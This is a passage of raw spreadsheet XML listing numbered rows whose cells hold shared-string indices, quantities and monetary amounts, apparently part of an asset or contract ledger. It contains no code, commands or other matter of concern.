        <v>2118</v>
      </c>
    </row>
    <row r="14" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A14" s="93"/>
      <c r="B14" s="88">
        <v>8</v>
      </c>
      <c r="C14" s="237" t="s">
        <v>2744</v>
      </c>
      <c r="D14" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E14" s="238" t="s">
        <v>2745</v>
      </c>
      <c r="F14" s="9"/>
      <c r="G14" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H14" s="11">
        <v>1</v>
      </c>
      <c r="I14" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J14" s="126">
        <v>15000</v>
      </c>
      <c r="K14" s="99">
        <v>0</v>
      </c>
      <c r="L14" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="15" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A15" s="93"/>
      <c r="B15" s="88">
        <v>9</v>
      </c>
      <c r="C15" s="237" t="s">
        <v>2746</v>
      </c>
      <c r="D15" s="238" t="s">
        <v>2747</v>
      </c>
      <c r="E15" s="238" t="s">
        <v>2748</v>
      </c>
      <c r="F15" s="9"/>
      <c r="G15" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H15" s="11">
        <v>1</v>
      </c>
      <c r="I15" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J15" s="126">
        <v>80000</v>
      </c>
      <c r="K15" s="99">
        <v>3200</v>
      </c>
      <c r="L15" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="16" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A16" s="93"/>
      <c r="B16" s="88">
        <v>10</v>
      </c>
      <c r="C16" s="237" t="s">
        <v>2749</v>
      </c>
      <c r="D16" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E16" s="238" t="s">
        <v>2750</v>
      </c>
      <c r="F16" s="9"/>
      <c r="G16" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H16" s="11">
        <v>1</v>
      </c>
      <c r="I16" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J16" s="126">
        <v>137500</v>
      </c>
      <c r="K16" s="99">
        <v>0</v>
      </c>
      <c r="L16" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="17" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A17" s="93"/>
      <c r="B17" s="88">
        <v>11</v>
      </c>
      <c r="C17" s="237" t="s">
        <v>2751</v>
      </c>
      <c r="D17" s="238" t="s">
        <v>2752</v>
      </c>
      <c r="E17" s="238" t="s">
        <v>2753</v>
      </c>
      <c r="F17" s="9"/>
      <c r="G17" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H17" s="11">
        <v>1</v>
      </c>
      <c r="I17" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J17" s="126">
        <v>391876.07</v>
      </c>
      <c r="K17" s="99">
        <v>0</v>
      </c>
      <c r="L17" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="18" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A18" s="93"/>
      <c r="B18" s="88">
        <v>12</v>
      </c>
      <c r="C18" s="237" t="s">
        <v>2754</v>
      </c>
      <c r="D18" s="238" t="s">
        <v>2755</v>
      </c>
      <c r="E18" s="238" t="s">
        <v>2756</v>
      </c>
      <c r="F18" s="9"/>
      <c r="G18" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H18" s="11">
        <v>1</v>
      </c>
      <c r="I18" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J18" s="126">
        <v>99000</v>
      </c>
      <c r="K18" s="99">
        <v>23880</v>
      </c>
      <c r="L18" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="19" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A19" s="93"/>
      <c r="B19" s="88">
        <v>13</v>
      </c>
      <c r="C19" s="237" t="s">
        <v>2757</v>
      </c>
      <c r="D19" s="238" t="s">
        <v>2758</v>
      </c>
      <c r="E19" s="238" t="s">
        <v>2759</v>
      </c>
      <c r="F19" s="9"/>
      <c r="G19" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H19" s="11">
        <v>1</v>
      </c>
      <c r="I19" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J19" s="126">
        <v>531000</v>
      </c>
      <c r="K19" s="99">
        <v>63720</v>
      </c>
      <c r="L19" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="20" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A20" s="93"/>
      <c r="B20" s="88">
        <v>14</v>
      </c>
      <c r="C20" s="237" t="s">
        <v>2760</v>
      </c>
      <c r="D20" s="238" t="s">
        <v>2761</v>
      </c>
      <c r="E20" s="238" t="s">
        <v>2762</v>
      </c>
      <c r="F20" s="9"/>
      <c r="G20" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H20" s="11">
        <v>1</v>
      </c>
      <c r="I20" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J20" s="126">
        <v>30000</v>
      </c>
      <c r="K20" s="99">
        <v>1920</v>
      </c>
      <c r="L20" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="21" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A21" s="93"/>
      <c r="B21" s="88">
        <v>15</v>
      </c>
      <c r="C21" s="237" t="s">
        <v>2763</v>
      </c>
      <c r="D21" s="238" t="s">
        <v>2764</v>
      </c>
      <c r="E21" s="238" t="s">
        <v>2765</v>
      </c>
      <c r="F21" s="9"/>
      <c r="G21" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H21" s="11">
        <v>1</v>
      </c>
      <c r="I21" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J21" s="126">
        <v>56000</v>
      </c>
      <c r="K21" s="99">
        <v>3584</v>
      </c>
      <c r="L21" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="22" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A22" s="93"/>
      <c r="B22" s="88">
        <v>16</v>
      </c>
      <c r="C22" s="237" t="s">
        <v>2766</v>
      </c>
      <c r="D22" s="238" t="s">
        <v>2767</v>
      </c>
      <c r="E22" s="238" t="s">
        <v>2768</v>
      </c>
      <c r="F22" s="9"/>
      <c r="G22" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H22" s="11">
        <v>1</v>
      </c>
      <c r="I22" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J22" s="126">
        <v>50000</v>
      </c>
      <c r="K22" s="99">
        <v>2000</v>
      </c>
      <c r="L22" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="23" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A23" s="93"/>
      <c r="B23" s="88">
        <v>17</v>
      </c>
      <c r="C23" s="237" t="s">
        <v>2769</v>
      </c>
      <c r="D23" s="238" t="s">
        <v>1261</v>
      </c>
      <c r="E23" s="238" t="s">
        <v>2770</v>
      </c>
      <c r="F23" s="9"/>
      <c r="G23" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H23" s="11">
        <v>2</v>
      </c>
      <c r="I23" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J23" s="126">
        <v>5000</v>
      </c>
      <c r="K23" s="99">
        <v>200</v>
      </c>
      <c r="L23" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="24" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A24" s="93"/>
      <c r="B24" s="88">
        <v>18</v>
      </c>
      <c r="C24" s="237" t="s">
        <v>2771</v>
      </c>
      <c r="D24" s="238" t="s">
        <v>1152</v>
      </c>
      <c r="E24" s="238" t="s">
        <v>2772</v>
      </c>
      <c r="F24" s="9"/>
      <c r="G24" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H24" s="11">
        <v>1</v>
      </c>
      <c r="I24" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J24" s="126">
        <v>25000</v>
      </c>
      <c r="K24" s="99">
        <v>0</v>
      </c>
      <c r="L24" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="25" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A25" s="93"/>
      <c r="B25" s="88">
        <v>19</v>
      </c>
      <c r="C25" s="237" t="s">
        <v>2773</v>
      </c>
      <c r="D25" s="238" t="s">
        <v>1152</v>
      </c>
      <c r="E25" s="238" t="s">
        <v>2774</v>
      </c>
      <c r="F25" s="9"/>
      <c r="G25" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H25" s="11">
        <v>2</v>
      </c>
      <c r="I25" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J25" s="126">
        <v>40000</v>
      </c>
      <c r="K25" s="99">
        <v>2560</v>
      </c>
      <c r="L25" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="26" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A26" s="93"/>
      <c r="B26" s="88">
        <v>20</v>
      </c>
      <c r="C26" s="237" t="s">
        <v>2775</v>
      </c>
      <c r="D26" s="238" t="s">
        <v>1261</v>
      </c>
      <c r="E26" s="238" t="s">
        <v>2776</v>
      </c>
      <c r="F26" s="9"/>
      <c r="G26" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H26" s="11">
        <v>1</v>
      </c>
      <c r="I26" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J26" s="126">
        <v>3000</v>
      </c>
      <c r="K26" s="99">
        <v>0</v>
      </c>
      <c r="L26" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="27" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A27" s="93"/>
      <c r="B27" s="88">
        <v>21</v>
      </c>
      <c r="C27" s="237" t="s">
        <v>2777</v>
      </c>
      <c r="D27" s="238" t="s">
        <v>2778</v>
      </c>
      <c r="E27" s="238" t="s">
        <v>2779</v>
      </c>
      <c r="F27" s="9"/>
      <c r="G27" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H27" s="11">
        <v>1</v>
      </c>
      <c r="I27" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J27" s="126">
        <v>702000</v>
      </c>
      <c r="K27" s="99">
        <v>44928</v>
      </c>
      <c r="L27" s="10"/>
    </row>
    <row r="28" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A28" s="93"/>
      <c r="B28" s="88">
        <v>22</v>
      </c>
      <c r="C28" s="237" t="s">
        <v>2780</v>
      </c>
      <c r="D28" s="238" t="s">
        <v>2781</v>
      </c>
      <c r="E28" s="238" t="s">
        <v>2782</v>
      </c>
      <c r="F28" s="9"/>
      <c r="G28" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H28" s="11">
        <v>1</v>
      </c>
      <c r="I28" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J28" s="126">
        <v>125600</v>
      </c>
      <c r="K28" s="99">
        <v>8038.4</v>
      </c>
      <c r="L28" s="10"/>
    </row>
    <row r="29" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A29" s="93"/>
      <c r="B29" s="88">
        <v>23</v>
      </c>
      <c r="C29" s="237" t="s">
        <v>2783</v>
      </c>
      <c r="D29" s="238" t="s">
        <v>2784</v>
      </c>
      <c r="E29" s="238" t="s">
        <v>2785</v>
      </c>
      <c r="F29" s="9"/>
      <c r="G29" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H29" s="11">
        <v>1</v>
      </c>
      <c r="I29" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J29" s="126">
        <v>191000</v>
      </c>
      <c r="K29" s="99">
        <v>12224</v>
      </c>
      <c r="L29" s="10"/>
    </row>
    <row r="30" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A30" s="93"/>
      <c r="B30" s="88">
        <v>24</v>
      </c>
      <c r="C30" s="237" t="s">
        <v>2786</v>
      </c>
      <c r="D30" s="238" t="s">
        <v>2787</v>
      </c>
      <c r="E30" s="238" t="s">
        <v>2788</v>
      </c>
      <c r="F30" s="9"/>
      <c r="G30" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H30" s="11">
        <v>1</v>
      </c>
      <c r="I30" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J30" s="126">
        <v>215000</v>
      </c>
      <c r="K30" s="99">
        <v>13760</v>
      </c>
      <c r="L30" s="10"/>
    </row>
    <row r="31" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A31" s="93"/>
      <c r="B31" s="88">
        <v>25</v>
      </c>
      <c r="C31" s="237" t="s">
        <v>2789</v>
      </c>
      <c r="D31" s="238" t="s">
        <v>2790</v>
      </c>
      <c r="E31" s="238" t="s">
        <v>2791</v>
      </c>
      <c r="F31" s="9"/>
      <c r="G31" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H31" s="11">
        <v>1</v>
      </c>
      <c r="I31" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J31" s="126">
        <v>735943.02</v>
      </c>
      <c r="K31" s="99">
        <v>47097.6</v>
      </c>
      <c r="L31" s="10"/>
    </row>
    <row r="32" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A32" s="93"/>
      <c r="B32" s="88">
        <v>26</v>
      </c>
      <c r="C32" s="237" t="s">
        <v>2792</v>
      </c>
      <c r="D32" s="238" t="s">
        <v>2793</v>
      </c>
      <c r="E32" s="238" t="s">
        <v>2794</v>
      </c>
      <c r="F32" s="9"/>
      <c r="G32" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H32" s="11">
        <v>1</v>
      </c>
      <c r="I32" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J32" s="126">
        <v>114800</v>
      </c>
      <c r="K32" s="99">
        <v>7347.2</v>
      </c>
      <c r="L32" s="10"/>
    </row>
    <row r="33" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A33" s="93"/>
      <c r="B33" s="88">
        <v>27</v>
      </c>
      <c r="C33" s="237" t="s">
        <v>2795</v>
      </c>
      <c r="D33" s="238" t="s">
        <v>952</v>
      </c>
      <c r="E33" s="238" t="s">
        <v>2796</v>
      </c>
      <c r="F33" s="9"/>
      <c r="G33" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H33" s="11">
        <v>1</v>
      </c>
      <c r="I33" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J33" s="126">
        <v>7600</v>
      </c>
      <c r="K33" s="99">
        <v>17664</v>
      </c>
      <c r="L33" s="10"/>
    </row>
    <row r="34" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A34" s="93"/>
      <c r="B34" s="88">
        <v>28</v>
      </c>
      <c r="C34" s="237" t="s">
        <v>2797</v>
      </c>
      <c r="D34" s="238" t="s">
        <v>2798</v>
      </c>
      <c r="E34" s="238" t="s">
        <v>2799</v>
      </c>
      <c r="F34" s="9"/>
      <c r="G34" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H34" s="11">
        <v>2</v>
      </c>
      <c r="I34" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J34" s="126">
        <v>640000</v>
      </c>
      <c r="K34" s="99">
        <v>40960</v>
      </c>
      <c r="L34" s="238" t="s">
        <v>2800</v>
      </c>
    </row>
    <row r="35" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A35" s="93"/>
      <c r="B35" s="88">
        <v>29</v>
      </c>
      <c r="C35" s="237" t="s">
        <v>2801</v>
      </c>
      <c r="D35" s="238" t="s">
        <v>2802</v>
      </c>
      <c r="E35" s="238" t="s">
        <v>2803</v>
      </c>
      <c r="F35" s="9"/>
      <c r="G35" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H35" s="11">
        <v>1</v>
      </c>
      <c r="I35" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J35" s="126">
        <v>120330</v>
      </c>
      <c r="K35" s="99">
        <v>0</v>
      </c>
      <c r="L35" s="10"/>
    </row>
    <row r="36" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A36" s="93"/>
      <c r="B36" s="88">
        <v>30</v>
      </c>
      <c r="C36" s="237" t="s">
        <v>2804</v>
      </c>
      <c r="D36" s="238" t="s">
        <v>2805</v>
      </c>
      <c r="E36" s="238" t="s">
        <v>2806</v>
      </c>
      <c r="F36" s="9"/>
      <c r="G36" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H36" s="11">
        <v>1</v>
      </c>
      <c r="I36" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J36" s="126">
        <v>67000</v>
      </c>
      <c r="K36" s="99">
        <v>4288</v>
      </c>
      <c r="L36" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="37" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A37" s="93"/>
      <c r="B37" s="88">
        <v>31</v>
      </c>
      <c r="C37" s="237" t="s">
        <v>2807</v>
      </c>
      <c r="D37" s="238" t="s">
        <v>2808</v>
      </c>
      <c r="E37" s="238" t="s">
        <v>2809</v>
      </c>
      <c r="F37" s="9"/>
      <c r="G37" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H37" s="11">
        <v>1</v>
      </c>
      <c r="I37" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J37" s="126">
        <v>337000</v>
      </c>
      <c r="K37" s="99">
        <v>21568</v>
      </c>
      <c r="L37" s="10"/>
    </row>
    <row r="38" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A38" s="93"/>
      <c r="B38" s="88">
        <v>32</v>
      </c>
      <c r="C38" s="237" t="s">
        <v>2810</v>
      </c>
      <c r="D38" s="238" t="s">
        <v>2811</v>
      </c>
      <c r="E38" s="238" t="s">
        <v>2812</v>
      </c>
      <c r="F38" s="9"/>
      <c r="G38" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H38" s="11">
        <v>1</v>
      </c>
      <c r="I38" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J38" s="126">
        <v>205000</v>
      </c>
      <c r="K38" s="99">
        <v>0</v>
      </c>
      <c r="L38" s="10"/>
    </row>
    <row r="39" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A39" s="93"/>
      <c r="B39" s="88">
        <v>33</v>
      </c>
      <c r="C39" s="237" t="s">
        <v>2813</v>
      </c>
      <c r="D39" s="238" t="s">
        <v>2814</v>
      </c>
      <c r="E39" s="238" t="s">
        <v>2815</v>
      </c>
      <c r="F39" s="9"/>
      <c r="G39" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H39" s="11">
        <v>1</v>
      </c>
      <c r="I39" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J39" s="126">
        <v>12000</v>
      </c>
      <c r="K39" s="99">
        <v>480</v>
      </c>
      <c r="L39" s="10" t="s">
        <v>2816</v>
      </c>
    </row>
    <row r="40" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A40" s="93"/>
      <c r="B40" s="88">
        <v>34</v>
      </c>
      <c r="C40" s="237" t="s">
        <v>2817</v>
      </c>
      <c r="D40" s="238" t="s">
        <v>2818</v>
      </c>
      <c r="E40" s="238" t="s">
        <v>2819</v>
      </c>
      <c r="F40" s="9"/>
      <c r="G40" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H40" s="11">
        <v>1</v>
      </c>
      <c r="I40" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J40" s="126">
        <v>2632436.13</v>
      </c>
      <c r="K40" s="99">
        <v>168473.6</v>
      </c>
      <c r="L40" s="10"/>
    </row>
    <row r="41" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A41" s="93"/>
      <c r="B41" s="88">
        <v>35</v>
      </c>
      <c r="C41" s="237" t="s">
        <v>2820</v>
      </c>
      <c r="D41" s="238" t="s">
        <v>2821</v>
      </c>
      <c r="E41" s="238" t="s">
        <v>2822</v>
      </c>
      <c r="F41" s="9"/>
      <c r="G41" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H41" s="11">
        <v>2</v>
      </c>
      <c r="I41" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J41" s="126">
        <v>28000</v>
      </c>
      <c r="K41" s="99">
        <v>1120</v>
      </c>
      <c r="L41" s="10"/>
    </row>
    <row r="42" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A42" s="93"/>
      <c r="B42" s="88">
        <v>36</v>
      </c>
      <c r="C42" s="237" t="s">
        <v>2823</v>
      </c>
      <c r="D42" s="238" t="s">
        <v>2798</v>
      </c>
      <c r="E42" s="238" t="s">
        <v>2824</v>
      </c>
      <c r="F42" s="9"/>
      <c r="G42" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H42" s="11">
        <v>2</v>
      </c>
      <c r="I42" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J42" s="126">
        <v>180000</v>
      </c>
      <c r="K42" s="99">
        <v>11520</v>
      </c>
      <c r="L42" s="10"/>
    </row>
    <row r="43" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A43" s="93"/>
      <c r="B43" s="88">
        <v>37</v>
      </c>
      <c r="C43" s="237" t="s">
        <v>2825</v>
      </c>
      <c r="D43" s="238" t="s">
        <v>2826</v>
      </c>
      <c r="E43" s="238" t="s">
        <v>2827</v>
      </c>
      <c r="F43" s="9"/>
      <c r="G43" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H43" s="11">
        <v>1</v>
      </c>
      <c r="I43" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J43" s="126">
        <v>3500</v>
      </c>
      <c r="K43" s="99">
        <v>8640</v>
      </c>
      <c r="L43" s="10"/>
    </row>
    <row r="44" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A44" s="93"/>
      <c r="B44" s="88">
        <v>38</v>
      </c>
      <c r="C44" s="237" t="s">
        <v>2828</v>
      </c>
      <c r="D44" s="238" t="s">
        <v>2829</v>
      </c>
      <c r="E44" s="238" t="s">
        <v>2830</v>
      </c>
      <c r="F44" s="9"/>
      <c r="G44" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H44" s="11">
        <v>1</v>
      </c>
      <c r="I44" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J44" s="126">
        <v>6300</v>
      </c>
      <c r="K44" s="99">
        <v>10432</v>
      </c>
      <c r="L44" s="10"/>
    </row>
    <row r="45" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A45" s="93"/>
      <c r="B45" s="88">
        <v>39</v>
      </c>
      <c r="C45" s="237" t="s">
        <v>2831</v>
      </c>
      <c r="D45" s="238" t="s">
        <v>2826</v>
      </c>
      <c r="E45" s="238" t="s">
        <v>2832</v>
      </c>
      <c r="F45" s="9"/>
      <c r="G45" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H45" s="11">
        <v>1</v>
      </c>
      <c r="I45" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J45" s="126">
        <v>50000</v>
      </c>
      <c r="K45" s="99">
        <v>3200</v>
      </c>
      <c r="L45" s="10"/>
    </row>
    <row r="46" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A46" s="93"/>
      <c r="B46" s="88">
        <v>40</v>
      </c>
      <c r="C46" s="237" t="s">
        <v>2833</v>
      </c>
      <c r="D46" s="238" t="s">
        <v>2826</v>
      </c>
      <c r="E46" s="238" t="s">
        <v>2832</v>
      </c>
      <c r="F46" s="9"/>
      <c r="G46" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H46" s="11">
        <v>1</v>
      </c>
      <c r="I46" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J46" s="126">
        <v>50000</v>
      </c>
      <c r="K46" s="99">
        <v>3200</v>
      </c>
      <c r="L46" s="10"/>
    </row>
    <row r="47" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A47" s="93"/>
      <c r="B47" s="88">
        <v>41</v>
      </c>
      <c r="C47" s="237" t="s">
        <v>2834</v>
      </c>
      <c r="D47" s="238" t="s">
        <v>2835</v>
      </c>
      <c r="E47" s="238" t="s">
        <v>2836</v>
      </c>
      <c r="F47" s="9"/>
      <c r="G47" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H47" s="11">
        <v>4</v>
      </c>
      <c r="I47" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J47" s="126">
        <v>40000</v>
      </c>
      <c r="K47" s="99">
        <v>2560</v>
      </c>
      <c r="L47" s="10"/>
    </row>
    <row r="48" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A48" s="93"/>
      <c r="B48" s="88">
        <v>42</v>
      </c>
      <c r="C48" s="237" t="s">
        <v>2837</v>
      </c>
      <c r="D48" s="238" t="s">
        <v>1211</v>
      </c>
      <c r="E48" s="238" t="s">
        <v>2838</v>
      </c>
      <c r="F48" s="9"/>
      <c r="G48" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H48" s="11">
        <v>1</v>
      </c>
      <c r="I48" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J48" s="126">
        <v>12000</v>
      </c>
      <c r="K48" s="99">
        <v>768</v>
      </c>
      <c r="L48" s="10"/>
    </row>
    <row r="49" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A49" s="93"/>
      <c r="B49" s="88">
        <v>43</v>
      </c>
      <c r="C49" s="237" t="s">
        <v>2839</v>
      </c>
      <c r="D49" s="238" t="s">
        <v>2821</v>
      </c>
      <c r="E49" s="238" t="s">
        <v>2840</v>
      </c>
      <c r="F49" s="9"/>
      <c r="G49" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H49" s="11">
        <v>3</v>
      </c>
      <c r="I49" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J49" s="126">
        <v>165000</v>
      </c>
      <c r="K49" s="99">
        <v>6600</v>
      </c>
      <c r="L49" s="10"/>
    </row>
    <row r="50" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A50" s="93"/>
      <c r="B50" s="88">
        <v>44</v>
      </c>
      <c r="C50" s="237" t="s">
        <v>2841</v>
      </c>
      <c r="D50" s="238" t="s">
        <v>2842</v>
      </c>
      <c r="E50" s="238" t="s">
        <v>2843</v>
      </c>
      <c r="F50" s="9"/>
      <c r="G50" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H50" s="11">
        <v>1</v>
      </c>
      <c r="I50" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J50" s="126">
        <v>10000</v>
      </c>
      <c r="K50" s="99">
        <v>400</v>
      </c>
      <c r="L50" s="10"/>
    </row>
    <row r="51" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A51" s="93"/>
      <c r="B51" s="88">
        <v>45</v>
      </c>
      <c r="C51" s="237" t="s">
        <v>2844</v>
      </c>
      <c r="D51" s="238" t="s">
        <v>2845</v>
      </c>
      <c r="E51" s="238" t="s">
        <v>2846</v>
      </c>
      <c r="F51" s="9"/>
      <c r="G51" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H51" s="11">
        <v>1</v>
      </c>
      <c r="I51" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J51" s="126">
        <v>3000</v>
      </c>
      <c r="K51" s="99">
        <v>192</v>
      </c>
      <c r="L51" s="10"/>
    </row>
    <row r="52" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A52" s="93"/>
      <c r="B52" s="88">
        <v>46</v>
      </c>
      <c r="C52" s="237" t="s">
        <v>2847</v>
      </c>
      <c r="D52" s="238" t="s">
        <v>2848</v>
      </c>
      <c r="E52" s="238" t="s">
        <v>2849</v>
      </c>
      <c r="F52" s="9"/>
      <c r="G52" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H52" s="11">
        <v>1</v>
      </c>
      <c r="I52" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J52" s="126">
        <v>2570</v>
      </c>
      <c r="K52" s="99">
        <v>160</v>
      </c>
      <c r="L52" s="10"/>
    </row>
    <row r="53" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A53" s="93"/>
      <c r="B53" s="88">
        <v>47</v>
      </c>
      <c r="C53" s="237" t="s">
        <v>2850</v>
      </c>
      <c r="D53" s="238" t="s">
        <v>2851</v>
      </c>
      <c r="E53" s="238" t="s">
        <v>2852</v>
      </c>
      <c r="F53" s="9"/>
      <c r="G53" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H53" s="11">
        <v>1</v>
      </c>
      <c r="I53" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J53" s="126">
        <v>1800</v>
      </c>
      <c r="K53" s="99">
        <v>72</v>
      </c>
      <c r="L53" s="10"/>
    </row>
    <row r="54" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A54" s="93"/>
      <c r="B54" s="88">
        <v>48</v>
      </c>
      <c r="C54" s="237" t="s">
        <v>2853</v>
      </c>
      <c r="D54" s="238" t="s">
        <v>2854</v>
      </c>
      <c r="E54" s="238" t="s">
        <v>2855</v>
      </c>
      <c r="F54" s="9"/>
      <c r="G54" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H54" s="11">
        <v>2</v>
      </c>
      <c r="I54" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J54" s="126">
        <v>137500</v>
      </c>
      <c r="K54" s="99">
        <v>23100</v>
      </c>
      <c r="L54" s="10"/>
    </row>
    <row r="55" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A55" s="93"/>
      <c r="B55" s="88">
        <v>49</v>
      </c>
      <c r="C55" s="237" t="s">
        <v>2856</v>
      </c>
      <c r="D55" s="238" t="s">
        <v>2733</v>
      </c>
      <c r="E55" s="238" t="s">
        <v>2857</v>
      </c>
      <c r="F55" s="9"/>
      <c r="G55" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H55" s="11">
        <v>2</v>
      </c>
      <c r="I55" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J55" s="126">
        <v>800000</v>
      </c>
      <c r="K55" s="99">
